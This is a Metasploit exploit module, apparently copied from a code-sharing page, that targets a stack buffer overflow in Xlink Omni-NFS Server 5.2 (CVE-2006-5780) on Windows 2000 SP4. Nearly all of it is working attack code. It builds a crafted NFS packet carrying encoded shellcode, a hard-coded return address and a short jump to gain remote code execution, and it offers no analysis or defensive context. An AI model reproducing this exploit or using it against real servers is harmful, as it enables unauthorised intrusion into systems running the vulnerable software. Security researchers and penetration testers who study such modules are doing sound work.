Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Remote
7
  Rank = AverageRanking
8

9
  include Msf::Exploit::Remote::Tcp
10

11
  def initialize(info = {})
12
    super(update_info(info,
13
      'Name'           => 'Omni-NFS Server Buffer Overflow',
14
      'Description'    => %q{
15
          This module exploits a stack buffer overflow in Xlink Omni-NFS Server 5.2
16
        When sending a specially crafted nfs packet, an attacker may be able
17
        to execute arbitrary code.
18
      },
19
      'Author'         => [ 'MC' ],
20
      'References'     =>
21
        [
22
          [ 'CVE', '2006-5780' ],
23
          [ 'OSVDB', '30224'],
24
          [ 'BID', '20941' ],
25
          [ 'URL', 'http://www.securityfocus.com/data/vulnerabilities/exploits/omni-nfs-server-5.2-stackoverflow.pm' ],
26
        ],
27
      'DefaultOptions' =>
28
        {
29
          'EXITFUNC' => 'process',
30
        },
31
      'Payload'        =>
32
        {
33
          'Space'    => 336,
34
          'BadChars' => "\x00",
35
          'PrepenEncoder' => "\x81\xc4\x54\xf2\xff\xff",
36
          'StackAdjustment' => -3500,
37
        },
38
      'Platform'       => 'win',
39
      'Targets'        =>
40
        [
41
          [ 'Windows 2000 SP4 English',     { 'Ret' => 0x0040bb2e } ],
42
        ],
43
      'Privileged'     => true,
44
      'DefaultTarget'  => 0,
45
      'DisclosureDate' => '2006-11-06'))
46

47
    register_options([Opt::RPORT(2049)])
48
  end
49

50
  def exploit
51
    connect
52

53
    buff =  payload.encoded
54
    buff << Rex::Arch::X86.jmp_short(6) + rand_text_english(2)
55
    buff << [target.ret].pack('V')
56
    buff << Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-330").encode_string
57
    buff << rand_text_english(251)
58

59
    pkt =  [1].pack('N')
60
    pkt << [0].pack('N')
61
    pkt << [2].pack('N')
62
    pkt << [100005].pack('N')
63
    pkt << [1].pack('N')
64
    pkt << [1].pack('N')
65
    pkt << [1].pack('N')
66
    pkt << [400].pack('N')
67
    pkt << buff[0,400]
68
    pkt << [1].pack('N')
69
    pkt << [400].pack('N')
70
    pkt << buff[300,400]
71

72
    sploit = [pkt.length | 0x80000000].pack('N') + pkt
73

74
    print_status("Trying target #{target.name}...")
75
    sock.put(sploit)
76

77
    handler
78
    disconnect
79
  end
80
end
81

82